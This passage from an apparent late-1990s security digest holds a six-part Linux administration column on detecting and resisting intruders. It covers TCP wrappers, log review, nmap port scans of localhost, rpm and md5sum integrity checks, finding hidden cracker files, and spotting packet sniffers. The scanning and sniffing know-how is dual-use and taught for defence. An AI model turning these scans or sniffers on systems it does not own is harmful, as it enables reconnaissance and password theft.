threats. I love short federal government definitions. Bad things that can
happen Undesirable events that can happen are disclosure of sensitive
information, modification of information, destruction of data,
unauthorized use of data or information (including by an insider), and
denial of service to authorized users. How many of you ever think about
overhead water sprinklers soaking your computer equipment reacting to a
false fire alarm late at night? How many of you who send credit card data
over your AOL account really think it is safe? Do we ever leave home
without our American Express cards anymore? What are some of the
vulnerabilities that computers have? How about the absence of contingency
plans, poor user security awareness and training, software errors, poor
password selection, vague laws or regulations about computer security
overall, open systems, lack of security standardization in the information
technology world, poor or limited defenses against automated attacks, and
social engineering techniques. Yes, Virginia, there are risks to using
computers. But we must use them. The best we can do is use security
countermeasures to help reduce that risk. Increasing threat awareness
training is our number one countermeasure to solving the long-term
computer security problem. Today, a typical computer can be turned on by
anyone, operated by anyone, opened up by anyone, and carried off by
anyone. The computer doesn't check your ID when you come up to it. A major
reason for the lack of threat awareness by people is the failure to grasp
what can be lost through security breaches. Stay tuned for the rest of the
series: Part One: Introduction Part Two: Who is in charge? What needs to
be protected? Part Three: Detailed laundry list of your vulnerabilities
coming November 4 Part Four: What is your INFOSEC disaster recovery plan?
coming November 5 John D. Johnson is a security consultant based in
California and a former Special Security Officer with the U.S. Government.

@HWA

57.0 Thwarting the systems cracker parts 1 to 6
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Thwarting the System Cracker, Part 1

by Marcel Gagné <mggagne@salmar.com> 23-Sep-1999

Welcome to your weekly dose of System Administration.

Before we dive headlong into this week's topic, allow me a quick
introduction. This column is the first of a weekly series in which I
intend to tackle stories and ideas that are near and dear to the Linux
system and network administrator's heart. My plan is to address
issues for users of all levels--from the person who was made administrator
because he or she dared admit they "knew a little about computers" (often
followed with "Congratulations! You are now in charge of the entire
company's IT well-being."
) to the experienced, married-to-the-job systems
and network people who go home and dream about print queues, system
performance, resource management, and penguins. That said, I invite
readers to e-mail me (mggagne@salmar.com) and let me know what topics you
would like to see covered that relate to the care and feeding of Linux
servers and how to keep them healthy and happy. As time goes on, I'll try
to deal with as many of those issues as I can.

'Nuff said! Let's move on to this week's topic: the growing scourge of the
network cracker ...

In the last few months, I've answered an increasing number of calls from
people whose systems have been cracked. Usually they're not aware of this,
and the call starts out more like: "There seems to be something wrong with
my e-mail. Could you have a look at it?"
I log on, do a quick look
around and see his footprints everywhere. A wily cracker has struck again.

When you set up your Linux system, you brought up a powerful, high-level,
multi-tasking network operating system--one that was maybe a little too
powerful. Out of the box, some distributions start a large number of
services (rlogind, inetd, httpd, innd, fingerd, timed, rhsd, and
others). Do you know what they all are? I do. As Sys Admin, you've got
enough things to worry about, such as that hung printer, but if your
machine is exposed to the Internet, you should pay particular attention.

Most crackers don't tend to be innovators. They use the latest distributed
exploits (programs and/or techniques) to break through a well-known or
recently uncovered security hole in your system. The good news is that
you, as a security administrator, are just as capable of becoming
aware of these exploits. Regular visits to your Linux distribution web
site such as Red Hat or Caldera Systems are a good way to stay on top of
the latest patches to stop those exploits. While you're at it, find out
about the exploits themselves by checking out the bugtraq forum or CERT,
to name just a couple. Innovators or not, cracking a system is made so
much easier if the door to your server is left wide open.

The simplest means of controlling access (short of turning off your
machine) is through a program called a TCP wrapper. Odds are you loaded it
as part of your system install. Using the wrapper, we can restrict access
to some of those services I mentioned earlier. Best of all, the
wrapper logs attempts to gain entry to your system, so you can track who
is testing the locks on your virtual doors. If you do not need to have
people logging in to your system (using telnet or rlogin), then you should
close the door to remote access by adding this line to your
/etc/hosts.deny file:

ALL:ALL

The first ALL refers to all services. The second ALL refers to everybody.
Nobody gets in. Y'hear?

Now, we should probably let the people on your internal network have
access (no?). I'll pretend you've set up your LAN with the approved
internal network addressing scheme as detailed in RFC 1918 (What's an RFC?
Hmm ... we do have a lot to cover.) I'll use a class C network at
192.168.1x for our example. We'll also add your localhost (127.0.0.1)
network. Here's the hosts.allow entry:

ALL: 127.0.0.1

ALL: 192.168.1.

Yes, that's right. There's a dot after the one and nothing else. Now
everyone in the 192.168.1.whatever network can get in to your system. Now,
restart your inetd process.

/etc/rc.d/init.d/inet restart

Safe, right? Not exactly. The hosts.deny file controls access only to
services listed in /etc/inetd.conf and wrapped by /usr/bin/tcpd, your TCP
wrapper. The wrapper looks at incoming network requests, compares them to
what is in your hosts.allow and hosts.deny files, and makes a yes or
no decision on what to allow through. You could be running services not
covered by the wrapper, or you may not have had the wrapper configured and
our cracker has already gotten through. How can you tell? How can you make
your system even more secure?

More on that next week. Until then, fix that printer, will you?

Thwarting the System Cracker, Part 2

by Marcel Gagné <mggagne@salmar.com> 4-Oct-1999

Reading the trail: what a TCP wrapper can tell you.

Hello everyone. Thanks for coming back. Thanks also for the enormous
feedback on last week's article. The vast majority seemed to appreciate my
"start small and work your way up" approach to administration. While
security administration may seem like an enormous topic to start
with, I thought it was important enough to cover now rather than later. As
mentioned, I will take all comments into consideration and try to gear
this series around the majority of those suggestions.

Last week, I provided some insight into the simplest method of protecting
your system, the TCP wrapper. Your Linux system does a great job of
tracking access through its system logs, and denying access through the
wrapper means you've just added some useful information to those
logs. Change to the /var/log directory and list the files there with ls.

# cd /var/log # ls

Here's a sample of what you should see there.

boot.log cron cron.1 cron.2 dmesg httpd lastlog
lastlog.1 maillog maillog.1 maillog.2 messages messages.1
netconf.log netconf.log.1 netconf.log.2 secure secure.1 secure.2
secure.3 secure.4 spooler spooler.1 spooler.2 uucp wtmp
wtmp.1 xferlog xferlog.1 xferlog.2

Notice how the various log files have a dot-1, 2, 3, or dot-4 extension.
This happens on a regular basis when your system runs its cron.daily
files. Actually, cron.daily is a directory under /etc and contains a
number of administration scripts that your system runs
automatically. Without you lifting a finger, Linux uses these scripts to
keep things tidy, such as rotating your log files so they don't grow to
enormous proportions (like in the old days of UNIX, when I had to walk 14
miles to school uphill in both directions and had to do my own log file
pruning).

Have a look at those cron jobs, and familiarize yourself with what happens
there. These are text files--you can more them, or vi, or read them in
emacs. While you are at it, notice that the system also has a cron.hourly,
cron.weekly, and cron.monthly. A couple of those directories may be
empty. The actual dates and times for hourly, weekly, and so on are in the
/etc/crontab file.

From a cracker detection point of view, your secure.? file will be of
particular interest. If you turned off all access (other than your local
network) as described last week, you can check for possible attempts like
this:

grep refused /var/log/secure*

Here's the output of an actual attempt. I've blanked out the address for
(ahem) security reasons.


Sep 12 07:52:42 netgate in.rlogind[7138]: refused connect from
2??.?.5?.?42 Sep 12 07:52:52 netgate in.rshd[7139]: refused connect from
2??.?.5?.?42 Sep 12 07:52:55 netgate in.rexecd[7144]: refused connect
from 2??.?.5?.?42 Sep 12 07:52:59 netgate imapd[7146]: refused connect
from 2??.?.5?.42 Sep 12 07:52:59 netgate in.fingerd[7142]: refused
connect from 2??.?.5?.?42 Sep 12 07:53:00 netgate ipop3d[7143]: refused
connect from 2??.?.5?.?42 Sep 12 07:53:07 netgate in.ftpd[7147]: refused
connect from 2??.?.5?.?42 Sep 12 07:53:10 netgate gn[7145]: refused
connect from 2??.?.5?.?42 Sep 12 07:53:22 netgate in.telnetd[7149]:
refused connect from 2??.?.5?.?42 Sep 12 07:56:34 netgate imapd[7150]:
refused connect from 2??.?.5?.?42

As you can see, my cracker tried several ports, or services, on my server,
netgate, all of which were refused because of my wrapper's configuration
and the resulting logs. I took the information from this log and e-mailed
it to the security authority of the ISP the cracker was using.

Now, this doesn't mean the cracker will never get in, but you know they
are trying and that's a great start.

You can also more some of the other files for additional information. The
maillog files will give you a picture of what e-mail messages are routing
through your machine. If you'd like to see ftp transfers to and from your
machine, have a look at the xferlog files. The other file of
interest here is wtmp.

To view the contents of wtmp, use the last command--you cannot simply cat
or more this file. However, you might want to pipe the output of last to
more.

# last | more

fishduck ttyp6 nexus Tue Sep 28
16:03 still logged in
birdrat ttyp5 speedy Tue Sep 28
15:57 still logged in
root tty1 Tue Sep 28
12:54 still logged in

This will give you the contents of the wtmp file which details who logged
in when, for how long, and whether they are still logged in. Make sure
these are all people who you want to have access. Maybe you don't know who
birdrat is.

If you haven't checked your logs in a while and you would like to see what
is in wtmp.1, use this version of the last command:

# last -f /var/log/wtmp.1 | more

The last thing (no pun intended) I would like you to consider this week is
the state of the logs themselves. If you find too little activity in your
logs, or the logs tend to be sized at zero bytes or missing altogether,
that is also important information. Knowing something is amiss is
the first step towards doing something about it.

I've run out of space for this week, but let me finish by giving you a
hint of where we'll go next. We'll visit the various services, discuss
what they do, and decide whether you need them at all. As a treat, I'll
show how to use a popular hacker tool, the port scanner, to better
secure your own system.

Thwarting the System Cracker, Part 3


by Marcel Gagné <mggagne@salmar.com> 7-Oct-1999

Getting to know your enemy through network ports and port scanners.

For the serious newbies out there, here's how networks work on a really,
really basic level. Your system's master process, the one that got the
system going (after you pushed the 'on' switch that is) is called 'init'.
init's process ID is 1. It is always 1. If you want to check it out,
find init in your process table using 'ps'.

# ps ax | grep init 1 ? S 6:03 init

One of the services that init starts when your system boots is 'inetd'.
Its job is to listen for network requests which it references by way of
internet socket numbers or ports. For instance, when you telnet to your
system by typing "telnet mysystem", you are actually requesting that
inetd on mysystem starts an in.telnetd process which handles communication
over port 23. Then, in.telnetd starts a process which eventually asks for
your login name and password and, miraculously, you are logged in.
Basically, inetd listens to find out what other daemons should wake up to
answer the port request. If you want to see what those service numbers
translate to, do a 'more' (or 'less') on /etc/services, a text file that
lists the known TCP service ports.

From a resources perspective, it makes sense to have a single process
listening rather than one for each and every service. For those of you who
can remember and visualize such things, picture Lily Tomlin as the
telephone operator who (eventually) patches people through to the
party to whom they wished to speak. She is inetd and the people to whom
you wish to speak are the service deamons. You request extension 23 and
eventually, she puts you through.

When inetd starts, it reads a file called inetd.conf . You'll find this
one in your '/etc' directory. Here are a couple of sample lines from
inetd.conf.

# # These are standard services. # ftp stream tcp nowait
root /usr/sbin/tcpd in.ftpd -l -a telnet stream tcp nowait root
/usr/sbin/tcpd in.telnetd # # Shell, login, exec, comsat and talk are
BSD protocols. # shell stream tcp nowait root /usr/sbin/tcpd
in.rshd login stream tcp nowait root /usr/sbin/tcpd in.rlogind
#exec stream tcp nowait root /usr/sbin/tcpd in.rexecd

When a cracker first visits your site with the intention of breaking in,
he will often employ a tool known as a port scanner to find out what inetd
is listening for on your system.

One of my favorite port scanners is nmap. You can pick up nmap from
http://www.insecure.org/nmap/index.html . The latest version even comes
with a nice GUI front end called nmapfe. Let's run nmap against my test
system and see what we get.

The options are '-sS', for TCP SYN, or half-open scan, and '-O', for OS
fingerprinting. OS fingerprinting means that nmap will try to guess the OS
version running on the system. A cracker who knows what release of an OS
you are running will use that information to decide on the most
likely exploits for a successful entry. Here's the nmap command and the
output from my test system.

# nmap -sS -O localhost

Starting nmap V. 2.3BETA5 by Fyodor (fyodor@dhp.com,
www.insecure.org/nmap/) Interesting ports on localhost (127.0.0.1): Port
State Protocol Service 21 open tcp ftp
23 open tcp telnet 25 open
tcp smtp 53 open tcp domain
79 open tcp finger 80 open
tcp http 98 open tcp linuxconf
111 open tcp sunrpc 113 open
tcp auth 139 open tcp
netbios-ssn 513 open tcp login
514 open tcp shell 515 open
tcp printer

TCP Sequence Prediction: Class=random positive increments
Difficulty=4360068 (Good luck!)
Remote operating system guess: Linux 2.1.122 - 2.2.12

Nmap run completed -- 1 IP address (1 host up) scanned in 2
seconds

Those open ports are the jumping off point for your cracker. With this
information, they know what to bother with and what to forget about. If
there is no daemon listening on a network port, why bother trying to get
in that way?

Now, go back and look at your /etc/inetd.conf file. Notice that exec is
commented out (there's a hash mark , '#', or octothorp, at the beginning
of the line) but login is not. If you reference that with the output of
nmap, you'll see that those services not commented out in inetd.conf
are listed while those with the hash mark at the beginning are not.

This is how you shut down unnecessary ports monitored by inetd. Your TCP
wrapper is keeping an eye on those ports, but if no one needs to have
access to remote shell, why have inetd listen for it at all? The wrapper's
job is to provide access to specific services for specific IP
addresses. In the first article, we did the quick lock-down with the
wrapper. Now, go through your list of services, decide what you need and
what you don't, then disable the don'ts by commenting out those lines.

To activate the changes, you need to restart inetd. Find inetd's process
id and send a SIGHUP to it. That means you do a 'kill - 1' on the process.
BE CAREFUL. A 'kill dash 1' looks an awful lot like a 'kill 1'. Do you
remember what process had id 1? Kill init and you kill the whole
system. If you are worried and don't mind typing a few extra keystrokes,
use 'kill -SIGHUP' instead of 'kill -1'.

Now, let's re-run nmap.

Starting nmap V. 2.3BETA5 by Fyodor (fyodor@dhp.com,
www.insecure.org/nmap/) Interesting ports on localhost (127.0.0.1): Port
State Protocol Service 21 open tcp ftp
23 open tcp telnet 25 open
tcp smtp 53 open tcp domain
80 open tcp http 111 open
tcp sunrpc 113 open tcp auth
139 open tcp netbios-ssn 515 open
tcp printer

TCP Sequence Prediction: Class=random positive increments
Difficulty=3487082 (Good luck!) Remote operating system guess: Linux
2.1.122 - 2.2.12

Nmap run completed -- 1 IP address (1 host up) scanned in 3 seconds

This last run is the same as the one previous from a command standpoint,
but finger, linuxconf, shell, and login are gone. I could argue that the
smart thing would have been to leave rlogin in place and deactivate
telnet, but keep in mind that this is an example. Disabling telnet
may not be appropriate for your location. For those services that are run
by inetd, disabling them in this manner completely removes them from
external access, even beyond your /etc/hosts.allow file (discussed in the
first part of this series).

What should you disable? If you are running a single, private machine that
does not require anyone in the outside world to access it, then just about
everything in the list could go. However, if you have a small network with
a couple of PCs, you may still want to run ftp, telnet, or rlogin.

One final note. Use tools like port scanners wisely. Use them only to test
the security of your own systems and never, never use them to scan other
people's systems. Remember, just as you are learning to deal with and
watch for the cracker, so can others watch you.

You're right. There's lots more, but once again, I've gone way over my
allotted space for the week. Next time around, I'll show you how your
system package tools can help you determine if some of you files have been
compromised. Until then, take care, and happy hunting.

Thwarting the System Cracker, Part 4

by Marcel Gagné <mggagne@salmar.com> 14-Oct-1999

This week's episode: verifying the integrity of your files.

Comedian Steven Wright expresses an interesting dilemma. Someone broke
into his house, he says, stole everything and replaced all those things
with an identical copy. In the world of the system cracker, this isn't
such a crazy idea.

Here's what happens. Using some well-known hole or exploit, a cracker
finds his or her way onto your system. Yet, when you do a "ps", there is
no evidence. When you do an "ls", there is no evidence. You think your
password file looks normal but you can't be sure. What to do?

One of the first things your cracker will do is replace certain files on
your system. You will wind up with a new version of "netstat" so that a
"netstat -a" does not show any evidence of your cracker's presence. The
cracker will also replace any file that might give him or her away.

Some of those files are as follows.

/bin/ps /bin/netstat /usr/bin/top

Since the files have been replaced, simply doing an "ls" will only confirm
that the files are there. There are a number of ways that you can detect
modified files on your system. If you are running Red Hat, Caldera,
TurboLinux, or any of the releases that use the Red Hat Package
Manager (aka RPM) concept, I'm going to show you a cool way to do this.

The first thing you need to do is find out what package these files came
from. Using the rpm command , you can identify the location of a file (say
"netstat") with this version of the command.

# rpm -qf /bin/netstat

The system comes back with this reply.

net-tools-1.51-3

Now, I can scan this entire package to find out what has been changed with
this version of the rpm command.

rpm -V net-tools (You can leave off the version info)

Now, on my test system, I've modified my "/bin/netstat" binary (I replaced
the 6.0 version with 5.2 in this case). The result of the above command
should be nothing -- a return to the shell prompt (the hash mark).
Instead, I get this.

.......T /bin/netstat

The "/bin/netstat" file shows up as having been modified. If I check using
rpm (rpm -qf /bin/ps) for the location of "ps" and "/usr/bin/top", I find
that they belong to the "procps" package. I will then run an rpm verify on
procps. Here's a sample output from a hacked system.

# rpm -qf /bin/ps procps.2.0.2-2

# rpm -V procps SM5..UGT /bin/ps SM5..UGT /usr/bin/top

Our cracker has gone in and replaced our version of "ps" and "top" so that
we cannot see the processes he is running, maybe a sniffer or an irc
"bots". The sniffer, by the way, is a program that essentially watches all
your users' comings and goings and traps their passwords so that the
cracker can use valid user logins to do their work, further hiding their
tracks.

I'll give you a quick script now to run through your entire rpm database
and check all your packages for tampering. Before I do that, I want to
give you a warning. Not all files flagged by this report are hacked. For
instance, the password file on your system is not the same as it was
when it was first installed. After all, you added at least one user and
changed at least one password. Any file that is different from the
original install will show up as modified. Binaries, or compiled programs
like netstat, should never show up in this list. Here's the little script.

#!/bin/bash # # Run through rpm database and report
inconsistencies # for rpmlist in `rpm -qa` # These quotes are
back quotes do echo " ----- $rpmlist -----" ; rpm -V $rpmlist done >
/tmp/rpmverify.out

When you run this script, the output is redirected to the temporary file
"/tmp/rpmverify.out". You can use "more" or "less" to view the contents of
the file.

Since I mentioned that configuration and text files (/etc/passwd,
/etc/inetd.conf, etc) will very likely show up as changed when you run
this script, how do you know if these are your changes and not those of
your cracker? If your system is pristine, or in a state you can be
sure of--such as immediately after an install or an upgrade--you can take
"fingerprints" of your files, print out the information and refer to it if
you suspect something has changed.

A way to do this is with md5sum -- those without rpm (Debian, Slackware,
etc) can use this method to fingerprint their binaries as well. Here's the
way to do it. I'll use a few files, including some binaries.

# md5sum /etc/passwd d8439475fac2ea638cbad4fd6ca4bc22
/etc/passwd

# md5sum /bin/ps 6d16efee5baecce7a6db7d1e1a088813 /bin/ps

# md5sum /bin/netsat
b7dda3abd9a1429b23fd8687ad3dd551 /bin/netstat

Please note. These are the numbers from my system. You don't want to write
these down. The information will vary based on release and what you have in
your text and configuration files. Other than the ones mentioned, you might
want to check the following.

Remember, print the results out and check them from time to time to help you
determine if the wily cracker has entered your domain. Here are those files.

/usr/bin/passwd
/sbin/portmap
/bin/login
/bin/ls
/usr/bin/top
/etc/inetd.conf
/etc/services

This should give you a good starting point. Crackers will not change every
file on your system and monitoring a few specific files is enough to give you
a good idea as to whether or not something has been changed without your knowledge.

Well, it's that time again; the end of another column. Next week, we'll look at
the things you can't see after a system has been cracked. Just in case you are
starting to wonder if we are going to cover anything other than security, rest
assured that security is only one of many concerns for the system and network
administrator.

Until next week, take care, and happy hunting!

Thwarting the System Cracker, Part 5

by Marcel Gagné <mggagne@salmar.com> 22-Oct-1999

Adventures in system administration continue with "Looking for the Invisible."

Hello everyone, and welcome back. After last week's article, I received a few
panicked e-mails telling me that after using the RPM trick, files like "netstat"
and "ls" had actually been modified. The question that followed was fairly
obvious: "What now?"
You have a fair number of options. Depending on the importance of the
system, I will usually recommend taking a backup of the user directories,
password and other critical system files, and rebuild the system without
these files, using the backup as a reference for the new system. I won't
just copy those files back. Our cracker may have hidden things in
legitimate places and we don't want to let him back in quite that easily.

You can also leave the system alone, tie down the host access with TCP
wrappers, shutting down non-essential services, and replacing affected
packages. Starting clean is important, but we don't always have that
luxury -- not immediately anyway. If you discover that your "procps"
or "net-tools" package has been modified by a cracker, the first thing to
do is to reinstall the package. Since that package may have been the hole
through which your cracker entered, it is usually a good idea to get the
latest build from your vendor (RedHat, Caldera, Debian, etc). For the
truly paranoid, the fact is that once a cracker has access to your system,
they can replace anything, including the very files we use to track down
the damage. Like the Shaolin priests in the old TV series, "Kung-Fu", the
cracker succeeds by being invisible.

Now, let's have a look at those invisible things.

Here is a real-life example. After a cracker attack, the machine was tied
down, TCP wrappers were installed and all affected packages replaced. It
was time to scope out the damage while keeping a close eye on the logs for
repeated attempts at break-in. Looking at the /etc/passwd file, I
noticed a user that did not belong on the system, "jon." It looked like a
normal passwd entry and did not have root privs. With several users on
this machine, our cracker hid nicely in the passwd list.

When I went to his home directory (/home/jon) and did an "ls -l", all I
got was this.

. .. .. .bashrc .bash_history .screenrc emech.tar.gz

Other than a file called emech.tar.gz, things did not look that strange.
Could that be all that was wrong? With a closer look though, you'll notice
that there are two ".." directories (pointers to the previous directory in
your filesystem hierarchy). That's strange. However, if I change
directory to ".." with "cd ..", I just wind up in the /home directory.
What's up?

What's up is that there is an extra space after the second dot- dot. I can
find this out like this.

# cd /home/jon # echo .* | cat -v

. .. .. .bashrc .bash_history .screenrc emech.tar.gz

Look very closely. Notice how each item is seperated by only one space.
Now look between the second "dot-dot" and .bashrc. There are actually two
spaces which means the directory is actually "dot-dot-space." To get into
that directory and have a look
around, I do this.

# cd ".. "

Now an "ls" shows me all this fun stuff.

randfiles mech.set mech.pid checkmech cpu.memory
mech.help mech.usage mech mech.levels emech.users
psdevtab

That's interesting. Let's see if jon has any more files hidden around the
disk. Using the find command again, I specify a search for files belonging
only to this user-id.

# find / -user jon -print

Aside from what is in the /home/jon directory, I get this partial list.

/usr/local/bin/.httpd
/tmp/cl
/tmp/.l/bcast
/tmp/.l/.l
/tmp/.l/imapd
/tmp/.l/log
/tmp/.l/pscan
/tmp/.l/pscan.c
/tmp/.l/rpc
/tmp/.l/slice2
/tmp/.l/sniffer
/tmp/.l/sxploit
/tmp/.l/thc
/tmp/.l/ufs.c

Looking a bit more interesting, isn't it? Sniffers. Port scanners. Our
cracker was making quite a home for himself. Furthermore, we discovered
two other users coming from different hosts with their own files. Our
cracker was either operating from different locations with different IDs
or he had friends.

In doing this search, there were even files belonging to this cracker in
legitimate user directories, including one very scary file, something
called "tcp.log." This file was several hundred lines long and contained
every telnet and ftp login that had come to and from the machine.
EVERY ONE! Aside from telling the person whose machine had been broken
into that they should rebuild the whole thing from scratch, I also told
them to change each and every password, not only on this system but on
every system they have access to.

Here's the scoop. Part of the information your cracker collects is a list
of logins and passwords you use on other systems. Why? So they have an
easier time breaking into someone else's system. Every system you have
been accessing while your cracker has had access to your system is
at risk. You should contact the system administrators of those other
systems and inform them of the risk they face. The flip side is that
someone logging into your system on a regular basis whose system had been
hacked may have give the cracker a valid login and password on your
system. Spooky, huh?

Here are a few examples to help you search for the hidden and dangerous.
For starters, check the user directories for "suid" or "guid" files. These
are programs that have an "s" instead of an "x" when you do an ls. For
instance, an "ls -l" on /usr/bin/passwd returns this information.

-r-s--x--x 1 root root 10704 Apr 14 1999 /usr/bin/passwd

The "s" in the fourth position means that the passwd program acts as root
when it is being executed. This is necessary in order to allow users to
change their passwords. The second "x" is simply and "x," but an "s" in
this position would mean that any user in that group would act as
that group. Programs that can act as a specific user or group are not a
bad thing -- usually. That said, for the most part, no regular
(non-administrative) user needs to have root-suid files in their home
directories. Look for them this way. The
command assumes that your users are created in the /home directory.

# find /home -perm -4000 -o -perm -2000 -print

What else can we do? Since we want to speed up the process of finding
programs and files left behind by our cracker, a quick way to look for
hidden directories would be good. This command will show you those. It
will also show you things like ".kde" and so on, but you'll also find
things like dot-dot-space and dot-dot-dot, perfect hidey-holes for your
cracker.

# find / -type d -name ".*" -print

The "-type d" option means to list directories only. This can be a big
list, but it is certainly a smaller one than you would get if you just
walked through every file and directory on the system. What's nice here is
that your proper dot and dot-dot directories ("." being the current
directory and ".." being the parent directory) do not show up in this
list. If you see a dot-dot, it will have some other hidden character
following it.

I've run out of space, so let's sum up. Blowing away everything on your
cracked system and starting over is a quick and dirty approach that lets
you create a properly secure system right from scratch. Eventually, this
is what you should probably do anyhow. If your system must be up,
using a new box and making that your new production system is probably the
next best bet, but providing a brand new system while you investigate the
damage to the old one can be costly. PCs are inexpensive, but not
everybody is ready to shell out a few thousand to bring another system
online. The catch is this -- your cracker has left a wealth of information
behind, information you may need. Getting rid of that information is a bit
like getting rid of the evidence. It's tough to do an investigation
without evidence. Weigh the costs of either decision, then act. But do
act.

A quick note of thanks for all the comments I've received on this column,
and there have been many. As time goes by, I will try to address those
issues that you find important. I'd had some second thoughts about
starting the system administration column with
something like security, but from the comments, this issue is in the minds
of many. Thanks again. Until next week, happy hunting.

Thwarting the System Cracker, Part 6

by Marcel Gagné <mggagne@salmar.com> 29-Oct-1999

Do you smell something? An intro to network sniffers.

Before we get into today's topic, let me cover a small piece of
administrivia. A question that keeps coming up in the feedback letters
(yes, we do read those things!) is the one regarding past articles. For
recent articles, just click down the News and Information column
until you see the link for MORE ARTICLES (all topics) ... . Click there,
and you'll be taken to an archive of past articles.

One more note: I firmly believe that the best way to beat the cracker is
to understand how the cracker works, what his tools are, how they work,
and how your system works. It's vital to understand that the tools I
present here are for use on your network. As much as I would like to
make every reader of this column an expert, there will always be things I
miss. Without sounding too paranoid, though, I'd like everyone to walk
away from these discussions just a little bit paranoid.

Last week, I mentioned in my "real life" example that my cracker was using
a sniffer to monitor network traffic and collect user names and passwords.
Since I did not go into much detail then, I'll try to clarify what I meant
by sniffing. Simply put, a sniffer is a tool that lets you monitor
packets as they "fly" across your network interface. You could simply
monitor your machine's own traffic, but sniffers use promiscuous mode to
scan all packets bound for your network.

Allow me to demonstrate.

If I run the command ifconfig eth0 on my machine, I get the following
output:

eth0 Link encap:Ethernet HWaddr 00:C0:4F:E3:C1:8F
inet addr:192.168.22.2 Bcast:192.168.22.255 Mask:255.255.255.0 UP
BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:49448 errors:0
dropped:0 overruns:0 frame:0 TX packets:33859 errors:0 dropped:0
overruns:0 carrier:0 collisions:6 txqueuelen:100 Interrupt:10 Base
address:0x300

Now let's open up a couple of terminal or xterm windows. In one window,
we'll start a sniffer program. The one I'm using is called sniffit and I
will start it in interactive mode.

# sniffit -i

In the second window, re-run the ifconfig command and look for the
differences. I'll focus on the important line here.


UP BROADCAST RUNNING PROMISC MULTICAST MTU:1500 Metric:1

Notice the addition of the word "PROMISC" in this line, short for
"promiscuous mode". What that means is your network interface is
indiscriminate as to what network traffic is listening for. Normally, your
system is capturing only information bound for your IP address. If you put
your network interface in promiscuous mode, it will receive all packets on
the network.

sniffit is a light, curses-based program that will work in a regular
terminal window. I obtained my copy from my Linux vendor's contrib ftp
site. You can also visit the web site directly at
http://reptile.rug.ac.be/~coder/sniffit/sniffit.html. One of the cool
things about this package is if you hit return on one of the open
sockets in the interactive list, you can watch the plaintext traffic going
to and from the user's process. Yes, you can actually see what they are
typing. (This almost begs a future column on secure shell, doesn't it?)

Another similar product is netwatch. This is also a network monitoring
tool that shows you what connections are alive on your network. You can
get netwatch from the application home page at
http://www.slctech.org/~mackay/netwatch.html or various other
sources.

Now, if you are busy collecting commands to run as part of your system
administration toolkit, you could do worse than to check for interfaces
running in promiscuous mode. Simply run the ifconfig command and grep for
PROMISC, like this:

ifconfig | grep PROMISC

By now, if I've made you so scared of loading anything new on your system,
but you would still like to try out a sniffer and see what happens, you're
in luck. When you installed your Linux system, you probably also installed
a little package called tcpdump. While not as flashy as the other
two sniffers I mentioned, this little program will do the same thing. If
you've ever wondered what goes on across your network, you'll find this
enlightening. Here's how to do it. From the command line, type the
following:

# tcpdump

In a few seconds, you should start seeing packets coming from and going to
your system. Here's some output from my system. I told tcpdump to watch
for traffic coming to and from www.linuxjournal.com. Notice the -l flag.
That is to tell tcpdump to show me the output I was busy capturing
to a file for later perusal.

# tcpdump host www.linuxjournal.com -l | tee /tmp/tcpdump.out

This is what the output looked like when I clicked on the web site
address:

16:41:49.101002 www2.linuxjournal.com.www > marcel.somedomain.com.1432: F
2303148464:2303148464(0) ack 1998428290 win 16352 16:41:49.101206
marcel.somedomain.com.1432 > www2.linuxjournal.com.www: . ack 1 win 32120
(DF) 16:41:50.001024 www2.linuxjournal.com.www >
marcel.somedomain.com.1429: F 1805282316:1805282316(0) ack 1988937134 win
16352 16:41:50.001215 marcel.somedomain.com.1429 >
www2.linuxjournal.com.www: . ack 1 win 32120 (DF) 16:41:50.840998
www2.linuxjournal.com.www > marcel.somedomain.com.1431: F
1539885010:1539885010(0) ack 1997163524 win 16352 16:41:50.841198
marcel.somedomain.com.1431 > www2.linuxjournal.com.www: . ack 1 win 32120
(DF) 16:41:51.494356 marcel.somedomain.com.1429 >
www2.linuxjournal.com.www: P 1:335(334) ack 1 win 32120 (DF)
16:41:51.497003 marcel.somedomain.com.1433 > www2.linuxjournal.com.www: S
2019129753:2019129753(0) win 32120 (DF) 16:41:51.671023
www2.linuxjournal.com.www > marcel.somedomain.com.1429:
R

There are many sniffer programs available. Some are stripped-down packages
that simply keep track of logins and passwords from any telnet or ftp
session. Your cracker may use a modified ps to hide the presence of the
sniffer as it logs away the hours. It may also have a perfectly innocent
name in the process table, even if your "ps" is fine.

Enough with the sniffers and on to other things. Way back when I started
this column, I made passing reference to CERT. Carnegie Mellon University
runs the CERT Coordination Center (http://www.cert.org). If your system
has been cracked, you should consider reporting the incident to
CERT. Their web site has extensive security information, and "alerts"
describing security issues or software weaknesses. One thing you can and
should do is subscribe to the CERT advisories:


http://www.cert.org/contact_cert/certmaillist.html

Before I wrap up for yet another week, this final note. To the handful of
people whose feedback comments were "What if the cracker changes rpm or
md5sum?"
, you now have an understanding of how tricky this whole security
business is. My answer to this would be, immediately after
installing your system and before you hook up to the Internet, get md5sums
of md5sum and rpm, print out the results, and store them for future
reference. It's nice to know people are paying attention.

Trust nothing but hard copy. Until next week, happy hunting!

@HWA

58.0 Crossroads: Linux networking and security
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Introduction to Linux Networking and Security

by Wei-Mei Shyr and Brian Borowski


Congratulations to ACM Crossroads and Wei-Mei Shyr and Brian Borowski!
This article was given an Academic Excellence Award by StudyWeb and a
link back to this article can be found on the StudyWeb site under the
category Computer Science: Operating Systems: Linux

Linux is a member of the UNIX family but is different
than most UNIX implementations because it provides a
great UNIX server/workstation environment at a low
cost, can be run on a wide variety of platforms, and
contains no proprietary code. In this article, we will
give a brief introduction to the IP networking
services, how to configure them, and how to set up a
relatively secure Linux workstation. Please note that
the examples given here are from the Slackware
distribution. The paths of the files might be different
on other distributions of Linux.

Linux TCP/IP Network Services

Linux supports a full and high quality implementation of the TCP/IP
networking protocols. With a network interface card or a modem and PPP,
one can connect a machine to a local area network or the Internet and
have access to many additional services and network utilities. Linux
provides two methods of establishing host-network services. Servers can
either run stand-alone or under the control of a program called inetd.
Heavily used services will usually run stand-alone. This means the
service does all the management and listening on a socket or port. The
most common stand-alone services are inetd, syslogd, portmapper, named,
and routed. The file /etc/rc.d/rc.inet2 configures the stand-alone
services. Here is an example of /etc/rc.d/rc.inet2

#!/bin/sh
#
# rc.inet2 This shell script boots up the entire INET system.
# Constants.
NET="/usr/sbin"
IN_SERV="lpd"
LPSPOOL="/var/spool/lpd"
echo -n "Starting daemons:"

